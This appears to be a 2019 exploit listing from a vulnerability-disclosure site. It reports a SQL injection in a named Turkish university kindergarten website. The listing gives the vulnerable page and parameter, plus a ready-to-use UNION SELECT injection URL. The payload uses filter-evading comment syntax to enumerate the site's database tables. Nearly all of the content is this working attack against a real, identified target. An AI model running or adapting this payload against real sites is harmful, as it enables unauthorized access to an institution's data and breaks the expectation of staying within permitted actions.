kocaeli univercity SQL injection Vul

2019.06.08
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: SQL Injection in “ http://anaokulu.kocaeli.edu.tr “ #----------------------------------------------------------------------------------------- # Exploit Author: Prototyqe/Furkan Özer #----------------------------------------------------------------------------------------- # Date: 08.06.2019 #----------------------------------------------------------------------------------------- # Category: Web Application #----------------------------------------------------------------------------------------- # Vulnerability Path: http://anaokulu.kocaeli.edu.tr/etkinlik.php?title=23_nisan_gosterisi&id=[SQL] #----------------------------------------------------------------------------------------- #http://anaokulu.kocaeli.edu.tr/etkinlik.php?title=23_nisan_gosterisi&id=696%27/*!50000UnIoN*/%20/*!50000SeLeCT*/%200,group_concat(table_name),2,3,4,5,6,7,8,9%20from%20/*!50000inFoRMAtiON_SchEMA.TabLEs%20where%20table_schema=database()*/%20--%20proto #-----------------------------------------------------------------------------------------


Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top